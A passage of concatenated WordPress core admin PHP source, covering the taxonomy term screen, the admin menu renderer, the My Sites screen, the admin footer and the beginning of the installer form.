( is_plugin_active( 'wpcat2tag-importer/wpcat2tag-importer.php' ) ) { $import_link = admin_url( 'admin.php?import=wpcat2tag' ); } else { $import_link = admin_url( 'import.php' ); } ?> <div class="wrap nosubsub"> <h1 class="wp-heading-inline"><?php echo esc_html( $title ); ?></h1> <?php if ( isset( $_REQUEST['s'] ) && strlen( $_REQUEST['s'] ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( wp_unslash( $_REQUEST['s'] ) ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php $class = ( isset( $_REQUEST['error'] ) ) ? 'error' : 'updated'; if ( $message ) { wp_admin_notice( $message, array( 'id' => 'message', 'additional_classes' => array( $class ), 'dismissible' => true, ) ); $_SERVER['REQUEST_URI'] = remove_query_arg( array( 'message', 'error' ), $_SERVER['REQUEST_URI'] ); } ?> <div id="ajax-response"></div> <form class="search-form wp-clearfix" method="get"> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php $wp_list_table->search_box( $tax->labels->search_items, 'tag' ); ?> </form> <?php $can_edit_terms = current_user_can( $tax->cap->edit_terms ); if ( $can_edit_terms ) { ?> <div id="col-container" class="wp-clearfix"> <div id="col-left"> <div class="col-wrap"> <?php if ( 'category' === $taxonomy ) { /** * Fires before the Add Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'add_category_form_pre', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_pre_add_form' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires before the link category form. * * @since 2.3.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'add_link_category_form_pre', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_pre_add_form' ); } else { /** * Fires before the Add Tag form. * * @since 2.5.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param string $taxonomy The taxonomy slug. */ do_action_deprecated( 'add_tag_form_pre', array( $taxonomy ), '3.0.0', '{$taxonomy}_pre_add_form' ); } /** * Fires before the Add Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_pre_add_form` * - `post_tag_pre_add_form` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_pre_add_form", $taxonomy ); ?> <div class="form-wrap"> <h2><?php echo $tax->labels->add_new_item; ?></h2> <form id="addtag" method="post" action="edit-tags.php" class="validate" <?php /** * Fires inside the Add Tag form tag. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_term_new_form_tag` * - `post_tag_term_new_form_tag` * * @since 3.7.0 */ do_action( "{$taxonomy}_term_new_form_tag" ); ?> > <input type="hidden" name="action" value="add-tag" /> <input type="hidden" name="screen" value="<?php echo esc_attr( $current_screen->id ); ?>" /> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php wp_nonce_field( 'add-tag', '_wpnonce_add-tag' ); ?> <div class="form-field form-required term-name-wrap"> <label for="tag-name"><?php _ex( 'Name', 'term name' ); ?></label> <input name="tag-name" id="tag-name" type="text" value="" size="40" aria-required="true" aria-describedby="name-description" /> <p id="name-description"><?php echo $tax->labels->name_field_description; ?></p> </div> <div class="form-field term-slug-wrap"> <label for="tag-slug"><?php _e( 'Slug' ); ?></label> <input name="slug" id="tag-slug" type="text" value="" size="40" aria-describedby="slug-description" /> <p id="slug-description"><?php echo $tax->labels->slug_field_description; ?></p> </div> <?php if ( is_taxonomy_hierarchical( $taxonomy ) ) : ?> <div class="form-field term-parent-wrap"> <label for="parent"><?php echo esc_html( $tax->labels->parent_item ); ?></label> <?php $dropdown_args = array( 'hide_empty' => 0, 'hide_if_empty' => false, 'taxonomy' => $taxonomy, 'name' => 'parent', 'orderby' => 'name', 'hierarchical' => true, 'show_option_none' => __( 'None' ), ); /** * Filters the taxonomy parent drop-down on the Edit Term page. * * @since 3.7.0 * @since 4.2.0 Added `$context` parameter. * * @param array $dropdown_args { * An array of taxonomy parent drop-down arguments. * * @type int|bool $hide_empty Whether to hide terms not attached to any posts. Default 0. * @type bool $hide_if_empty Whether to hide the drop-down if no terms exist. Default false. * @type string $taxonomy The taxonomy slug. * @type string $name Value of the name attribute to use for the drop-down select element. * Default 'parent'. * @type string $orderby The field to order by. Default 'name'. * @type bool $hierarchical Whether the taxonomy is hierarchical. Default true. * @type string $show_option_none Label to display if there are no terms. Default 'None'. * } * @param string $taxonomy The taxonomy slug. * @param string $context Filter context. Accepts 'new' or 'edit'. */ $dropdown_args = apply_filters( 'taxonomy_parent_dropdown_args', $dropdown_args, $taxonomy, 'new' ); $dropdown_args['aria_describedby'] = 'parent-description'; wp_dropdown_categories( $dropdown_args ); ?> <?php if ( 'category' === $taxonomy ) : ?> <p id="parent-description"><?php _e( 'Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.' ); ?></p> <?php else : ?> <p id="parent-description"><?php echo $tax->labels->parent_field_description; ?></p> <?php endif; ?> </div> <?php endif; // is_taxonomy_hierarchical() ?> <div class="form-field term-description-wrap"> <label for="tag-description"><?php _e( 'Description' ); ?></label> <textarea name="description" id="tag-description" rows="5" cols="40" aria-describedby="description-description"></textarea> <p id="description-description"><?php echo $tax->labels->desc_field_description; ?></p> </div> <?php if ( ! is_taxonomy_hierarchical( $taxonomy ) ) { /** * Fires after the Add Tag form fields for non-hierarchical taxonomies. * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( 'add_tag_form_fields', $taxonomy ); } /** * Fires after the Add Term form fields. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_add_form_fields` * - `post_tag_add_form_fields` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_add_form_fields", $taxonomy ); ?> <p class="submit"> <?php submit_button( $tax->labels->add_new_item, 'primary', 'submit', false ); ?> <span class="spinner"></span> </p> <?php if ( 'category' === $taxonomy ) { /** * Fires at the end of the Edit Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'edit_category_form', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_add_form' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires at the end of the Edit Link form. * * @since 2.3.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'edit_link_category_form', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_add_form' ); } else { /** * Fires at the end of the Add Tag form. * * @since 2.7.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param string $taxonomy The taxonomy slug. */ do_action_deprecated( 'add_tag_form', array( $taxonomy ), '3.0.0', '{$taxonomy}_add_form' ); } /** * Fires at the end of the Add Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_add_form` * - `post_tag_add_form` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_add_form", $taxonomy ); ?> </form></div> </div> </div><!-- /col-left --> <div id="col-right"> <div class="col-wrap"> <?php } ?> <?php $wp_list_table->views(); ?> <form id="posts-filter" method="post"> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php $wp_list_table->display(); ?> </form> <?php if ( 'category' === $taxonomy ) : ?> <div class="form-wrap edit-term-notes"> <p> <?php printf( /* translators: %s: Default category. */ __( 'Deleting a category does not delete the posts in that category. Instead, posts that were only assigned to the deleted category are set to the default category %s. The default category cannot be deleted.' ), /** This filter is documented in wp-includes/category-template.php */ '<strong>' . apply_filters( 'the_category', get_cat_name( get_option( 'default_category' ) ), '', '' ) . '</strong>' ); ?> </p> <?php if ( current_user_can( 'import' ) ) : ?> <p> <?php printf( /* translators: %s: URL to Categories to Tags Converter tool. */ __( 'Categories can be selectively converted to tags using the <a href="%s">category to tag converter</a>.' ), esc_url( $import_link ) ); ?> </p> <?php endif; ?> </div> <?php elseif ( 'post_tag' === $taxonomy && current_user_can( 'import' ) ) : ?> <div class="form-wrap edit-term-notes"> <p> <?php printf( /* translators: %s: URL to Categories to Tags Converter tool. */ __( 'Tags can be selectively converted to categories using the <a href="%s">tag to category converter</a>.' ), esc_url( $import_link ) ); ?> </p> </div> <?php endif; /** * Fires after the taxonomy list table. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `after-category-table` * - `after-post_tag-table` * * @since 3.0.0 * * @param string $taxonomy The taxonomy name. */ do_action( "after-{$taxonomy}-table", $taxonomy ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores if ( $can_edit_terms ) { ?> </div> </div><!-- /col-right --> </div><!-- /col-container --> <?php } ?> </div><!-- /wrap --> <?php if ( ! wp_is_mobile() ) : ?> <script> try{document.forms.addtag['tag-name'].focus();}catch(e){} </script> <?php endif; $wp_list_table->inline_edit(); require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Custom header image script. * * This file is deprecated, use 'wp-admin/includes/class-custom-image-header.php' instead. * * @deprecated 5.3.0 * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } _deprecated_file( basename( __FILE__ ), '5.3.0', 'wp-admin/includes/class-custom-image-header.php' ); /** Custom_Image_Header class */ require_once ABSPATH . 'wp-admin/includes/class-custom-image-header.php'; <?php /** * Displays Administration Menu. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * The current page. * * @global string $self */ $self = preg_replace( '|^.*/wp-admin/network/|i', '', $_SERVER['PHP_SELF'] ); $self = preg_replace( '|^.*/wp-admin/|i', '', $self ); $self = preg_replace( '|^.*/plugins/|i', '', $self ); $self = preg_replace( '|^.*/mu-plugins/|i', '', $self ); /** * For when admin-header is included from within a function. * * @global array $menu * @global array $submenu * @global string $parent_file * @global string $submenu_file */ global $menu, $submenu, $parent_file, $submenu_file; /** * Filters the parent file of an admin menu sub-menu item. * * Allows plugins to move sub-menu items around. * * @since MU (3.0.0) * * @param string $parent_file The parent file. */ $parent_file = apply_filters( 'parent_file', $parent_file ); /** * Filters the file of an admin menu sub-menu item. * * @since 4.4.0 * * @param string $submenu_file The submenu file. * @param string $parent_file The submenu item's parent file. */ $submenu_file = apply_filters( 'submenu_file', $submenu_file, $parent_file ); get_admin_page_parent(); /** * Display menu. * * @access private * @since 2.7.0 * * @global string $self * @global string $parent_file * @global string $submenu_file * @global string $plugin_page * @global string $typenow The post type of the current screen. * * @param array $menu * @param array $submenu * @param bool $submenu_as_parent */ function _wp_menu_output( $menu, $submenu, $submenu_as_parent = true ) { global $self, $parent_file, $submenu_file, $plugin_page, $typenow; $first = true; // 0 = menu_title, 1 = capability, 2 = menu_slug, 3 = page_title, 4 = classes, 5 = hookname, 6 = icon_url. foreach ( $menu as $key => $item ) { $admin_is_parent = false; $class = array(); $aria_attributes = ''; $aria_hidden = ''; $is_separator = false; if ( $first ) { $class[] = 'wp-first-item'; $first = false; } $submenu_items = array(); if ( ! empty( $submenu[ $item[2] ] ) ) { $class[] = 'wp-has-submenu'; $submenu_items = $submenu[ $item[2] ]; } if ( ( $parent_file && $item[2] === $parent_file ) || ( empty( $typenow ) && $self === $item[2] ) ) { if ( ! empty( $submenu_items ) ) { $class[] = 'wp-has-current-submenu wp-menu-open'; } else { $class[] = 'current'; $aria_attributes .= 'aria-current="page"'; } } else { $class[] = 'wp-not-current-submenu'; if ( ! empty( $submenu_items ) ) { $aria_attributes .= 'data-ariahaspopup'; } } if ( ! empty( $item[4] ) ) { $class[] = esc_attr( $item[4] ); } $class = $class ? ' class="' . implode( ' ', $class ) . '"' : ''; $id = ! empty( $item[5] ) ? ' id="' . preg_replace( '|[^a-zA-Z0-9_:.]|', '-', $item[5] ) . '"' : ''; $img = ''; $img_style = ''; $img_class = ' dashicons-before'; if ( str_contains( $class, 'wp-menu-separator' ) ) { $is_separator = true; } /* * If the string 'none' (previously 'div') is passed instead of a URL, don't output * the default menu image so an icon can be added to div.wp-menu-image as background * with CSS. Dashicons and base64-encoded data:image/svg_xml URIs are also handled * as special cases. */ if ( ! empty( $item[6] ) ) { $img = '<img src="' . esc_url( $item[6] ) . '" alt="" />'; if ( 'none' === $item[6] || 'div' === $item[6] ) { $img = '<br />'; } elseif ( str_starts_with( $item[6], 'data:image/svg+xml;base64,' ) ) { $img = '<br />'; // The value is base64-encoded data, so esc_attr() is used here instead of esc_url(). $img_style = ' style="background-image:url(\'' . esc_attr( $item[6] ) . '\')"'; $img_class = ' svg'; } elseif ( str_starts_with( $item[6], 'dashicons-' ) ) { $img = '<br />'; $img_class = ' dashicons-before ' . sanitize_html_class( $item[6] ); } } $title = wptexturize( $item[0] ); // Hide separators from screen readers. if ( $is_separator ) { $aria_hidden = ' aria-hidden="true"'; } echo "\n\t<li$class$id$aria_hidden>"; if ( $is_separator ) { echo '<div class="separator"></div>'; } elseif ( $submenu_as_parent && ! empty( $submenu_items ) ) { $submenu_items = array_values( $submenu_items ); // Re-index. $menu_hook = get_plugin_page_hook( $submenu_items[0][2], $item[2] ); $menu_file = $submenu_items[0][2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $submenu_items[0][2] ) && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! file_exists( ABSPATH . "/wp-admin/$menu_file" ) ) ) { $admin_is_parent = true; echo "<a href='admin.php?page={$submenu_items[0][2]}'$class $aria_attributes><div class='wp-menu-image$img_class'$img_style aria-hidden='true'>$img</div><div class='wp-menu-name'>$title</div></a>"; } else { echo "\n\t<a href='{$submenu_items[0][2]}'$class $aria_attributes><div class='wp-menu-image$img_class'$img_style aria-hidden='true'>$img</div><div class='wp-menu-name'>$title</div></a>"; } } elseif ( ! empty( $item[2] ) && current_user_can( $item[1] ) ) { $menu_hook = get_plugin_page_hook( $item[2], 'admin.php' ); $menu_file = $item[2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $item[2] ) && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! file_exists( ABSPATH . "/wp-admin/$menu_file" ) ) ) { $admin_is_parent = true; echo "\n\t<a href='admin.php?page={$item[2]}'$class $aria_attributes><div class='wp-menu-image$img_class'$img_style aria-hidden='true'>$img</div><div class='wp-menu-name'>{$item[0]}</div></a>"; } else { echo "\n\t<a href='{$item[2]}'$class $aria_attributes><div class='wp-menu-image$img_class'$img_style aria-hidden='true'>$img</div><div class='wp-menu-name'>{$item[0]}</div></a>"; } } if ( ! empty( $submenu_items ) ) { echo "\n\t<ul class='wp-submenu wp-submenu-wrap'>"; echo "<li class='wp-submenu-head' aria-hidden='true'>{$item[0]}</li>"; $first = true; // 0 = menu_title, 1 = capability, 2 = menu_slug, 3 = page_title, 4 = classes. foreach ( $submenu_items as $sub_key => $sub_item ) { if ( ! current_user_can( $sub_item[1] ) ) { continue; } $class = array(); $aria_attributes = ''; if ( $first ) { $class[] = 'wp-first-item'; $first = false; } $menu_file = $item[2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } // Handle current for post_type=post|page|foo pages, which won't match $self. $self_type = ! empty( $typenow ) ? $self . '?post_type=' . $typenow : 'nothing'; if ( isset( $submenu_file ) ) { if ( $submenu_file === $sub_item[2] ) { $class[] = 'current'; $aria_attributes .= ' aria-current="page"'; } /* * If plugin_page is set the parent must either match the current page or not physically exist. * This allows plugin pages with the same hook to exist under different parents. */ } elseif ( ( ! isset( $plugin_page ) && $self === $sub_item[2] ) || ( isset( $plugin_page ) && $plugin_page === $sub_item[2] && ( $item[2] === $self_type || $item[2] === $self || file_exists( $menu_file ) === false ) ) ) { $class[] = 'current'; $aria_attributes .= ' aria-current="page"'; } if ( ! empty( $sub_item[4] ) ) { $class[] = esc_attr( $sub_item[4] ); } $class = $class ? ' class="' . implode( ' ', $class ) . '"' : ''; $menu_hook = get_plugin_page_hook( $sub_item[2], $item[2] ); $sub_file = $sub_item[2]; $pos = strpos( $sub_file, '?' ); if ( false !== $pos ) { $sub_file = substr( $sub_file, 0, $pos ); } $title = wptexturize( $sub_item[0] ); if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $sub_item[2] ) && file_exists( WP_PLUGIN_DIR . "/$sub_file" ) && ! file_exists( ABSPATH . "/wp-admin/$sub_file" ) ) ) { // If admin.php is the current page or if the parent exists as a file in the plugins or admin directory. if ( ( ! $admin_is_parent && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! is_dir( WP_PLUGIN_DIR . "/{$item[2]}" ) ) || file_exists( $menu_file ) ) { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), $item[2] ); } else { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), 'admin.php' ); } $sub_item_url = esc_url( $sub_item_url ); echo "<li$class><a href='$sub_item_url'$class$aria_attributes>$title</a></li>"; } else { echo "<li$class><a href='{$sub_item[2]}'$class$aria_attributes>$title</a></li>"; } } echo '</ul>'; } echo '</li>'; } echo '<li id="collapse-menu" class="hide-if-no-js">' . '<button type="button" id="collapse-button" aria-label="' . esc_attr__( 'Collapse Main Menu' ) . '" aria-expanded="true">' . '<span class="collapse-button-icon" aria-hidden="true"></span>' . '<span class="collapse-button-label">' . __( 'Collapse Menu' ) . '</span>' . '</button></li>'; } ?> <div id="adminmenumain" role="navigation" aria-label="<?php esc_attr_e( 'Main menu' ); ?>"> <a href="#wpbody-content" class="screen-reader-shortcut"><?php _e( 'Skip to main content' ); ?></a> <a href="#wp-toolbar" class="screen-reader-shortcut"><?php _e( 'Skip to toolbar' ); ?></a> <div id="adminmenuback"></div> <div id="adminmenuwrap"> <ul id="adminmenu"> <?php _wp_menu_output( $menu, $submenu ); /** * Fires after the admin menu has been output. * * @since 2.5.0 */ do_action( 'adminmenu' ); ?> </ul> </div> </div> <?php /** * My Sites dashboard. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ require_once __DIR__ . '/admin.php'; if ( ! is_multisite() ) { wp_die( __( 'Multisite support is not enabled.' ) ); } if ( ! current_user_can( 'read' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ) ); } $action = $_POST['action'] ?? 'splash'; $blogs = get_blogs_of_user( $current_user->ID ); $updated = false; if ( 'updateblogsettings' === $action && isset( $_POST['primary_blog'] ) ) { check_admin_referer( 'update-my-sites' ); $blog = get_site( (int) $_POST['primary_blog'] ); if ( $blog && isset( $blog->domain ) ) { update_user_meta( $current_user->ID, 'primary_blog', (int) $_POST['primary_blog'] ); $updated = true; } else { wp_die( __( 'The primary site you chose does not exist.' ) ); } } // Used in the HTML title tag. $title = __( 'My Sites' ); $parent_file = 'index.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen shows an individual user all of their sites in this network, and also allows that user to set a primary site. They can use the links under each site to visit either the front end or the dashboard for that site.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://codex.wordpress.org/Dashboard_My_Sites_Screen">Documentation on My Sites</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; if ( $updated ) { wp_admin_notice( '<strong>' . __( 'Settings saved.' ) . '</strong>', array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } ?> <div class="wrap"> <h1 class="wp-heading-inline"> <?php echo esc_html( $title ); ?> </h1> <?php if ( in_array( get_site_option( 'registration' ), array( 'all', 'blog' ), true ) ) { /** This filter is documented in wp-login.php */ $sign_up_url = apply_filters( 'wp_signup_location', network_site_url( 'wp-signup.php' ) ); printf( ' <a href="%s" class="page-title-action">%s</a>', esc_url( $sign_up_url ), esc_html__( 'Add New Site' ) ); } if ( empty( $blogs ) ) : wp_admin_notice( '<strong>' . __( 'You must be a member of at least one site to use this page.' ) . '</strong>', array( 'type' => 'error', 'dismissible' => true, ) ); ?> <?php else : ?> <hr class="wp-header-end"> <form id="myblogs" method="post"> <?php choose_primary_blog(); /** * Fires before the sites list on the My Sites screen. * * @since 3.0.0 */ do_action( 'myblogs_allblogs_options' ); ?> <br clear="all" /> <ul class="my-sites striped"> <?php /** * Filters the settings HTML markup in the Global Settings section on the My Sites screen. * * By default, the Global Settings section is hidden. Passing a non-empty * string to this filter will enable the section, and allow new settings * to be added, either globally or for specific sites. * * @since MU (3.0.0) * * @param string $settings_html The settings HTML markup. Default empty. * @param string $context Context of the setting (global or site-specific). Default 'global'. */ $settings_html = apply_filters( 'myblogs_options', '', 'global' ); if ( $settings_html ) { echo '<h3>' . __( 'Global Settings' ) . '</h3>'; echo $settings_html; } reset( $blogs ); foreach ( $blogs as $user_blog ) { switch_to_blog( $user_blog->userblog_id ); echo '<li>'; echo "<h3>{$user_blog->blogname}</h3>"; $actions = "<a href='" . esc_url( home_url() ) . "'>" . __( 'Visit' ) . '</a>'; if ( current_user_can( 'read' ) ) { $actions .= " | <a href='" . esc_url( admin_url() ) . "'>" . __( 'Dashboard' ) . '</a>'; } /** * Filters the row links displayed for each site on the My Sites screen. * * @since MU (3.0.0) * * @param string $actions The HTML site link markup. * @param object $user_blog An object containing the site data. */ $actions = apply_filters( 'myblogs_blog_actions', $actions, $user_blog ); echo "<p class='my-sites-actions'>" . $actions . '</p>'; /** This filter is documented in wp-admin/my-sites.php */ echo apply_filters( 'myblogs_options', '', $user_blog ); echo '</li>'; restore_current_blog(); } ?> </ul> <?php if ( count( $blogs ) > 1 || has_action( 'myblogs_allblogs_options' ) || has_filter( 'myblogs_options' ) ) { ?> <input type="hidden" name="action" value="updateblogsettings" /> <?php wp_nonce_field( 'update-my-sites' ); submit_button(); } ?> </form> <?php endif; ?> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * WordPress Administration Template Footer * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * @global string $hook_suffix */ global $hook_suffix; ?> <div class="clear"></div></div><!-- wpbody-content --> <div class="clear"></div></div><!-- wpbody --> <div class="clear"></div></div><!-- wpcontent --> <div id="wpfooter" role="contentinfo"> <?php /** * Fires after the opening tag for the admin footer. * * @since 2.5.0 */ do_action( 'in_admin_footer' ); ?> <p id="footer-left" class="alignleft"> <?php $text = sprintf( /* translators: %s: https://wordpress.org/ */ __( 'Thank you for creating with <a href="%s">WordPress</a>.' ), esc_url( __( 'https://wordpress.org/' ) ) ); /** * Filters the "Thank you" text displayed in the admin footer. * * @since 2.8.0 * * @param string $text The content that will be printed. */ echo apply_filters( 'admin_footer_text', '<span id="footer-thankyou">' . $text . '</span>' ); ?> </p> <p id="footer-upgrade" class="alignright"> <?php /** * Filters the version/update text displayed in the admin footer. * * WordPress prints the current version and update information, * using core_update_footer() at priority 10. * * @since 2.3.0 * * @see core_update_footer() * * @param string $content The content that will be printed. */ echo apply_filters( 'update_footer', '' ); ?> </p> <div class="clear"></div> </div> <?php /** * Prints scripts or data before the default footer scripts. * * @since 1.2.0 * * @param string $data The data to print. */ do_action( 'admin_footer', '' ); /** * Prints scripts and data queued for the footer. * * The dynamic portion of the hook name, `$hook_suffix`, * refers to the global hook suffix of the current page. * * @since 4.6.0 */ do_action( "admin_print_footer_scripts-{$hook_suffix}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** * Prints any scripts and data queued for the footer. * * @since 2.8.0 */ do_action( 'admin_print_footer_scripts' ); /** * Prints scripts or data after the default footer scripts. * * The dynamic portion of the hook name, `$hook_suffix`, * refers to the global hook suffix of the current page. * * @since 2.8.0 */ do_action( "admin_footer-{$hook_suffix}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores // get_site_option() won't exist when auto upgrading from <= 2.7. if ( function_exists( 'get_site_option' ) && false === get_site_option( 'can_compress_scripts' ) ) { compression_test(); } ?> <div class="clear"></div></div><!-- wpwrap --> <script>if(typeof wpOnload==='function')wpOnload();</script> </body> </html> <?php /** * WordPress Installer * * @package WordPress * @subpackage Administration */ // Confidence check. if ( false ) { ?> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Error: PHP is not running</title> </head> <body class="wp-core-ui admin-color-modern"> <h1>Error: PHP is not running</h1> <p>WordPress requires that your web server is running PHP. Your server does not have PHP installed, or PHP is turned off.</p> </body> </html> <?php } /** * We are installing WordPress. * * @since 1.5.1 * @var bool */ define( 'WP_INSTALLING', true ); /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; /** Load WordPress Administration Upgrade API */ require_once ABSPATH . 'wp-admin/includes/upgrade.php'; /** Load WordPress Translation Install API */ require_once ABSPATH . 'wp-admin/includes/translation-install.php'; /** Load wpdb */ require_once ABSPATH . WPINC . '/class-wpdb.php'; nocache_headers(); $step = isset( $_GET['step'] ) ? (int) $_GET['step'] : 0; /** * Display installation header. * * @since 2.5.0 * * @param string $body_classes Class attribute values for the body tag. */ function display_header( $body_classes = '' ) { header( 'Content-Type: text/html; charset=utf-8' ); if ( is_rtl() ) { $body_classes .= 'rtl'; } if ( $body_classes ) { $body_classes = ' ' . $body_classes; } ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex,nofollow" /> <title><?php _e( 'WordPress › Installation' ); ?></title> <?php wp_admin_css( 'install', true ); ?> </head> <body class="wp-core-ui admin-color-modern<?php echo $body_classes; ?>"> <p id="logo"><?php _e( 'WordPress' ); ?></p> <?php } // End display_header(). /** * Displays installer setup form. * * @since 2.8.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string|null $error Error message to display, if any. */ function display_setup_form( $error = null ) { global $wpdb; $user_table = ( $wpdb->get_var( $wpdb->prepare( 'SHOW TABLES LIKE %s', $wpdb->esc_like( $wpdb->users ) ) ) !== null ); // Ensure that sites appear in search engines by default. $blog_public = 1; if ( isset( $_POST['weblog_title'] ) ) { $blog_public = isset( $_POST['blog_public'] ) ? (int) $_POST['blog_public'] : $blog_public; } $weblog_title = isset( $_POST['weblog_title'] ) ? trim( wp_unslash( $_POST['weblog_title'] ) ) : ''; $user_name = isset( $_POST['user_name'] ) ? trim( wp_unslash( $_POST['user_name'] ) ) : ''; $admin_email = isset( $_POST['admin_email'] ) ? trim( wp_unslash( $_POST['admin_email'] ) ) : ''; if ( ! is_null( $error ) ) { ?> <h1><?php _ex( 'Welcome', 'Howdy' ); ?></h1> <p class="message"><?php echo $error; ?></p> <?php } ?> <form id="setup" method="post" action="install.php?step=2" novalidate="novalidate"> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="weblog_title"><?php _e( 'Site Title' ); ?></label></th> <td><input name="weblog_title" type="text" id="weblog_title" size="25" value="<?php echo esc_attr( $weblog_title ); ?>" /></td> </tr> <tr> <th scope="row"><label for="user_login"><?php _e( 'Username' ); ?></label></th> <td> <?php if ( $user_table ) { _e( 'User(s) already exists.' ); echo '<input name="user_name" type="hidden" value="admin" />'; } else { ?> <input name="user_name" type="text" id="user_login" size="25" aria-describedby="user-name-desc" value="<?php echo esc_attr( sanitize_user( $user_name, true ) ); ?>" /> <p id="user-name-desc"><?php _e( 'Usernames can have only alphanumeric characters, spaces, underscores, hyphens, periods, and the @ symbol.' ); ?></p> <?php } ?> </td> </tr> <?php if ( ! $user_table ) : ?> <tr class="form-field form-required user-pass1-wrap"> <th scope="row"> <label for="pass1"> <?php _e( 'Password' ); ?> </label> </th> <td> <div class="wp-pwd"> <?php $initial_password = isset( $_POST['admin_password'] ) ? stripslashes( $_POST['admin_password'] ) : wp_generate_password( 18 ); ?> <div class="password-input-wrapper"> <input type="password" name="admin_password" id="pass1" class="regular-text" autocomplete="new-password" spellcheck="false" data-reveal="1" data-pw="<?php echo esc_attr( $initial_password ); ?>" aria-describedby="pass-strength-result admin-password-desc" /> <div id="pass-strength-result" aria-live="polite"></div> </div> <button type="button" class="button wp-hide-pw hide-if-no-js" data-start-masked="<?php echo (int) isset( $_POST['admin_password'] ); ?>" data-toggle="0" aria-label="<?php esc_attr_e( 'Hide password' ); ?>"> <span class="dashicons dashicons-hidden"></span> <span class="text"><?php _e( 'Hide' ); ?></span> </button> </div> <p id="admin-password-desc"><span class="description important hide-if-no-js"> <strong><?php _e( 'Important:' ); ?></strong> <?php /* translators: The non-breaking space prevents 1Password from thinking the text "log in" should trigger a password save prompt. */ ?> <?php _e( 'You will need this password to 